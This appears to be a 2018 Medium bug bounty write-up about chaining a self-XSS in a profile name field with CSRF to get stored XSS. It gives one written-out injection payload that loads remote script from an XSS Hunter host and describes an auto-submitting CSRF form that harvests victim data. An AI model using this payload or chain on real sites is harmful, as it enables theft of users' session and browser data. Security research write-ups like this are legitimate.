Self-XSS + CSRF to Stored XSS

Renwa
Renwa
May 20, 2018 · 3 min read

Hola, this is Renwa from Kurdistan i’m glad to write my first write-up about infosec and Bugbounties.

so i was digging in the website and finally i found an xss when a user wants to change his name added a simple payload and refreshed the page, bingo!

Image for post
Image for post
user settings panel
Image for post
Image for post
XSS proof

so the problem is the profile is not public and the only way to get the XSS is to tell the victim to change his name to malicious javascript code and that will be called Self-XSS there is no impact with it.

i started burpsuite and changed my name the request looks like:

Image for post
Image for post

hmm that looks interesting, i generated burpsuite CSRF poc

Image for post
Image for post

replayed in browser response was:

Image for post
Image for post

Awesome! now we have CSRF + Self-XSS let’s chain that together the form now looks like:

Image for post
Image for post
Final POC

as you can see in the last name field i have added the javascript code it’s from xsshunter.com that generate XSS poc you should give a try.

“><script src=https://***.xss.ht></script>

and in the last i have added javascript submit form on load the file to make it more effective.

now the user name is changed to the javascript code after he navigate the homepage the code will be in his browser and send back all info’s we need since there wasn’t any CSP protection.

Image for post
Image for post
Stored XSS

and going back to XSSHunter we can confirm it became Stored XSS, when any user opens our HTML form.

Image for post
Image for post

After all thanks for reading if i helped clap hands to more write-ups about infosec, remember where there is self-XSS always look for CSRF to chain it together and make it a stored, by self-XSS i don’t mean user entered codes into browser console or self-dom XSS .

//Renwa

Welcome to a place where words matter. On Medium, smart voices and original ideas take center stage - with no ads in sight. Watch
Follow all the topics you care about, and we’ll deliver the best stories for you to your homepage and inbox. Explore
Get unlimited access to the best stories on Medium — and support writers while you’re at it. Just $5/month. Upgrade

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store